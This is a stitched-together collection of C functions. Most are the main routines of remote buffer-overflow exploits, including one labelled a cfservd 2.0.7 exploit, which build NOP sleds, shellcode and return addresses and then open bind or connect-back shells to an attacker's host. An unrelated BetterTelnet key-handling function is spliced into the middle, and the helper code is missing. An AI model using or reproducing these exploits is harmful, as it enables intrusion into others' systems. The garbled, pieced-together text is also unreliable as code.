int main (void) {
char buff[416];
int a;
changeip(IP);
changeport(cb, PORT, PORT_OFFSET);
for (a = 0; a < 200; a++)
*(buff+a) = 0x90;
for (int b = 0; *(cb+b); a++, b++)
*(buff+a) = *(cb+b);
for (; a + 4 <= POE; a += 4)
memcpy(buff+a, (addys+ADDY), 4);
*(buff+a) = 0;
fwrite(buff, strlen(buff), 1, stdout);
return(0);
}
int main(int argc, char *argv[]) {
char opt;
char *host, *ptr, *ip="";
struct sockaddr_in sockadd;
int i, i_len, ok=0, mode=0, flag=0;
int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
int target=TARGET, scsize=SC_SIZE_1, port=PORT;
int timeout=TIME_OUT, interval=INTERVAL;
long retaddr;
WSADATA wsd;
SOCKET s1, s2;
if (argc<2) { usage(argv[0]); }
while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
switch(opt) {
case 'a':
align=atoi(optarg);
break;
case 'I':
interval=atoi(optarg);
break;
case 'T':
timeout=atoi(optarg);
break;
case 't':
target=atoi(optarg);
retaddr=targets[target-1].jmpesp;
break;
case 'i':
ip=optarg;
changeip(ip);
break;
case 'l':
mode=1;
scsize=SC_SIZE_2;
break;
case 'r':
retsize=atoi(optarg);
break;
case 's':
sc_offset=atoi(optarg);
break;
case 'h':
ok=1;
host=optarg;
sockadd.sin_addr.s_addr=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'H':
showtargets();
break;
default:
usage(argv[0]);
break;
}
}
if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }
memset(buff,NOP,BSIZE);
ptr=buff+align;
for(i=0;i<retsize;i+=4) {
*((long *)ptr)=retaddr;
ptr+=4;
}
if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
err_exit("-> WSAStartup error....");
}
if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
err_exit("-> socket() error...");
}
sockadd.sin_family=AF_INET;
sockadd.sin_port=htons((SHORT)port);
ptr=buff+retsize+sc_offset;
if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");
banner();
if (mode) {
printf("-> 'Listening' mode...( port: %d )\n",port);
changeport(connback, port, PORT_OFFSET_2);
for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
do_send(host,timeout);
Sleep(1000);
sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
i_len=sizeof(sockadd);
if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
err_exit("-> bind() error");
}
if (listen(s1,0)<0) {
err_exit("-> listen() error");
}
printf("-> Waiting for connection...\n");
s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);
if (s2<0) {
err_exit("-> accept() error");
}
printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));
resetalarm();
doshell(s2);
}
else {
printf("-> 'Connecting' mode...\n",port);
changeport(bindport, port, PORT_OFFSET_1);
for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
do_send(host,timeout);
Sleep(1000);
printf("-> Will try connecting to shell now....\n");
i=0;
while(!flag) {
Sleep(interval*1000);
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
printf("-> Trial #%d....\n",i++);
}
else { flag=1; }
}
printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);
resetalarm();
doshell(s1);
}
return 0;
}
int main(int argc, char *argv[]) {
char opt;
char *buf, *ptr, *ip="";
struct sockaddr_in sockadd;
int i, s1, s2, i_len, ok=0, mode=0;
int time_out=TIME_OUT, scsize=SC_SIZE_1;
int s_port=S_PORT, t_port=T_PORT, offset=RET_OFFSET;
int retsize=RET_SIZE, align=ALIGN, buffsize=BUFF_SIZE;
long ret_addr;
if (argc<2) { usage(argv[0]); }
while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) {
switch(opt) {
case 'i':
ip=optarg;
changeip(ip);
break;
case 'l':
mode=1;
scsize=SC_SIZE_2;
break;
case 'T':
time_out=atoi(optarg);
break;
case 'b':
buffsize=atoi(optarg);
break;
case 'a':
align=atoi(optarg);
break;
case 'h':
ok=1;
sockadd.sin_addr.s_addr = inet_addr(optarg);
break;
case 'r':
retsize=atoi(optarg);
break;
case 't':
t_port=atoi(optarg);
break;
case 's':
s_port=atoi(optarg);
break;
case 'o':
offset=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); }
if (!(buf=malloc(buffsize+1))) {
err_exit("-> malloc() error");
}
ret_addr=RET_ADDR-offset;
fprintf(stdout,"\nCfservd Remote Exploit by snooq [ [email protected] ]\n");
fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n");
fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr);
ptr=buf;
for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; }
for(i=0;i<(buffsize-HDR_SIZE-align-scsize-retsize);i++) { *ptr++=NOP; }
if (mode) {
changeport(connback, s_port, PORT_OFFSET_2);
for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
}
else {
changeport(bindport, s_port, PORT_OFFSET_1);
for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
}
for(i=0;i<retsize;i+=4) {
*((long *)ptr)=ret_addr;
ptr+=4;
}
*ptr++=0;
sockadd.sin_family = AF_INET;
sockadd.sin_port = htons(t_port);
if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
err_exit("-> socket error");
}
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
err_exit("-> connect() error");
}
if (mode) {
fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port);
if (fork()==0) {
sleep(2);
if (send(s1,buf,buffsize,0)<0) {
err_exit("-> send() error");
}
fprintf(stdout,"-> Exploit string sent....\n");
exit(0);
}
else {
signal(SIGALRM,sigalrm);
alarm(time_out);
if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) {
err_exit("-> socket error");
}
memset(&sockadd,0,sizeof(sockadd));
sockadd.sin_family = AF_INET;
sockadd.sin_port = htons(s_port);
sockadd.sin_addr.s_addr = htonl(INADDR_ANY);
i_len=sizeof(sockadd);
if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) {
err_exit("-> bind() error");
}
if (listen(s2,0)<0) {
err_exit("-> listen() error");
}
wait();
close(s1);
fprintf(stdout,"-> Waiting for connection....\n");
s1=accept(s2,(struct sockaddr *)&sockadd,&i_len);
if (s1<0) {
err_exit("-> accept() error");
}
alarm(0);
fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr));
sendcmd(s1);
doshell(s1);
}
}
else {
if (send(s1,buf,buffsize,0)<0) {
err_exit("-> send() error");
}
close(s1);
fprintf(stdout,"-> 'Connecting' mode...\n");
fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n");
sleep(2);
sockadd.sin_family = AF_INET;
sockadd.sin_port = htons(s_port);
if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
err_exit("-> socket() error");
}
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n");
exit(0);
}
fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port);
sendcmd(s1);
doshell(s1);
}
return(0);
}
void process_key(unsigned char ascii,struct WindRec *tw)
{
if (tw->litNext) {
//do no processing on next key
tw->litNext = FALSE;
kbwrite(tw, &ascii, 1);
if (tw->echo) {
if (ascii>31 && ascii <127) {
/* add these chars to buffer */
parse(tw, &ascii, 1);
}
return;
}
}
if (tw->lmodeBits & 2) {
// TRAPSIG mode active
unsigned char toSend[2] = {IAC,0};
short whichSignal = 0;
if (ascii == tw->slc[SLC_IP]) {
whichSignal = SLC_IP;
toSend[1] = TEL_IP;
} else if (ascii == tw->slc[SLC_SUSP]) {
whichSignal = SLC_SUSP;
toSend[1] = TEL_SUSP;
}
// RAB BetterTelnet 2.0b1
// The defaults in parse.h are to send ABORT on ^\ which is usually correct, but
// feel free to hack this (in parse.h, not here) if BRK is better in your configuration.
else if (ascii == tw->slc[SLC_ABORT])
{
whichSignal = SLC_ABORT;
toSend[1] = TEL_ABORT;
}
else if (ascii == tw->slc[SLC_BRK]) // RAB BetterTelnet 2.0b1
{
whichSignal = SLC_BRK;
toSend[1] = TEL_BREAK;
}
if (toSend[1]) //if we have a signal to catch
{
// if (tw->echo)
// parse(tw, &ascii, 1); // echo if we should
tw->kblen=0; //zero out the buffer
netpush(tw->port);
netwrite(tw->port,toSend,2); //send IAC whatever
if (tw->slcLevel[whichSignal] & SLC_FLUSHIN)
{
unsigned char dm[2] = {IAC,TEL_DM};
netpush(tw->port);
netUrgent();//send next as urgent data
netwrite(tw->port,dm,2);//send IAC DM
}
if (tw->slcLevel[whichSignal] & SLC_FLUSHOUT)
{
unsigned char tm[3] = {IAC,TEL_DOTEL,N_TIMING};
tw->timing = 1; //tell ourselves to wait for WILL TIMING
netpush(tw->port);
netwrite(tw->port,tm,3);//send DO TIMING
}
return;
}
}
if ((tw->lmodeBits & L_SOFT_TAB)&&(ascii == 0x09)) // SOFT_TAB mode active; expand tab into spaces
{
short numSpaces = VSIgetNextTabDistance();
unsigned char spacechar = ' ';
while (numSpaces-- > 0) {
kbwrite(tw, &spacechar, 1);
}
if (tw->echo)
parse(tw, &ascii, 1);
return;
}
if (tw->lmodeBits & L_EDIT) //handle editing functions
{
if (ascii == '\015') //CR
{ //since we are in edit, send the buffer and CR-LF
kbflush(tw);
netpush(tw->port);
netwrite(tw->port,"\015\012",2);
if (tw->echo)
parse(tw,(unsigned char *) "\012\015",2);
return;
}
if (ascii == tw->slc[SLC_EC]) //kill the character
{
if (tw->echo)
parse(tw,(unsigned char *) "\010 \010",3);
tw->kblen--;
return;
}
else if (ascii == tw->slc[SLC_AO]) //kill the line
{
while (tw->kblen >0)
{
if (tw->echo)
parse(tw,(unsigned char *) "\010 \010",3);
tw->kblen--;
}
return;
}
else if (ascii == tw->slc[SLC_EL]) //kill the line
{
while (tw->kblen >0)
{
if (tw->echo)
parse(tw,(unsigned char *) "\010 \010",3);
tw->kblen--;
}
return;
}
else if ((ascii == tw->slc[SLC_EOF]) && (tw->lmodeBits & 2))
{ //push the buffer, send IAC EOF (RAB BetterTelnet 2.0b1 - only under TRAPSIG)
char eofString[2] = { IAC, TEL_EOF };
kbflush(tw);
// RAB BetterTelnet 2.0b1 - BAD! BAD! BAD!
// Fix for *BSD (and probably others):
// Putting ^D into Telnet's key buffer after sending an EOF could make it pop up later, so
// hitting some keys (arrows seemed to do the trick) that flushed Telnet's key buffer
// after a cat command which terminated with ^D caused a logout. Yuck.
// tw->kbbuf[0]=ascii;
// tw->kblen=1;
netpush(tw->port);
netwrite(tw->port,eofString, 2);
return;
}
// RAB BetterTelnet 2.0b1
// We don't need to do this down here if we're already handling TRAPSIG mode
// separately. The SUSP (usually ^Z) char is part of TRAPSIG, not EDIT.
// else if (ascii == tw->slc[SLC_SUSP])
// {
// char eofString[2] = { IAC, TEL_SUSP };
// if (tw->kblen > 0)
// netwrite(tw->port, tw->kbbuf, tw->kblen);
// tw->kblen = 0;
// netpush(tw->port);
// netwrite(tw->port,eofString, 2);
// return;
// }
else if (ascii == tw->slc[SLC_EW])
{
while ((tw->kbbuf[tw->kblen-1] != 0x20)&&(tw->kblen >= 0)) //while its not a space
{
if (tw->echo)
parse(tw,(unsigned char *)"\010 \010",3);
tw->kblen--;
}
}
else if (ascii == tw->slc[SLC_RP])
{
VSredrawLine(tw->vs);
return;
}
else if (ascii == tw->slc[SLC_LNEXT])
{
tw->litNext = TRUE;
return;
}
else if (ascii == tw->slc[SLC_XON])
{
if (tw->allow_flow) { //remote flow control can turn this off
tw->enabled = 1; // oops small bug (RAB BetterTelnet 2.0b1)
changeport(scrn, scrn);
}
return;
}
else if (ascii == tw->slc[SLC_XOFF])
{
if (tw->allow_flow) { //remote flow control can turn this off
tw->enabled = 0;
changeport(scrn, scrn);
}
return;
}
else if ((ascii == tw->slc[SLC_FORW1])||(ascii == tw->slc[SLC_FORW1]))
{
kbflush(tw);
netwrite(tw->port,&ascii,1);
return;
}
//ok, at this point, we are past all local editing functions. Now, add the character to the buffer.
else
{
kbwrite(tw, &ascii, 1);
}
}
else if (ascii == '\015') //CR; map this to CR-LF
{
unsigned char toSend[2] = {0x0D,0x00};
netpush(tw->port);
netwrite(tw->port,toSend,2);
if (tw->echo)
parse(tw,(unsigned char *) "\012\015",2);
return;
}
else //not editing; send it
{
netpush(tw->port);
netwrite( tw->port, &ascii, 1); // if full send buffer
}
if (tw->echo) /* Handle local ECHOs */
{
if (ascii>31 && ascii <127) /* add these chars to buffer */
parse(tw, &ascii, 1);
else /* not printable char */
{
if (!(tw->lmodeBits & L_LIT_ECHO)) //don't echo if this is set
{
ascii='@'+ascii;
parse(tw,(unsigned char *) "^",1);
parse(tw, &ascii, 1);
}
}
}
}
int main (int argc, char **argv) {
int sock;
unsigned offset = OFFSET, ipaddr, i = 0;
unsigned short port = PORT, cbport = CB_PORT;
struct sockaddr_in server;
char *host, *location, *cbip, buff[5120], opt;
host = location = cbip = 0;
while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) {
switch(opt) {
case 'i':
host = optarg;
break;
case 'p':
sscanf(optarg, "%hu", &port);
break;
case 'o':
sscanf(optarg, "%x", &offset);
break;
case 'l':
location = optarg;
break;
case '1':
cbip = optarg;
break;
case '2':
sscanf(optarg, "%hu", &cbport);
break;
}
}
if (!(host && location && cbip)) {
puts("-!> a required argument was missing\n");
help();
exit(1);
}
changeip(cbip);
changeport(cb, cbport, PORT_OFFSET);
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("socket() error: %s\n", strerror(errno));
exit(1);
}
server.sin_port = htons(port);
if ((ipaddr = inet_addr(host)) == -1) {
struct hostent *myhost;
if ((myhost = gethostbyname(host)) == 0) {
printf("-!> failed to resolve host '%s'\n", host);
exit(1);
}
memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length);
}
else server.sin_addr.s_addr = ipaddr;
server.sin_family = AF_INET;
memset(&(server.sin_zero), 0, 8);
if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) {
printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno));
exit(1);
}
sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"));
send(sock, buff, strlen(buff), 0);
for (0; i < 4000; i++) *(buff+i) = 0x90;
for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a);
for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4);
strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n");
send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0);
}
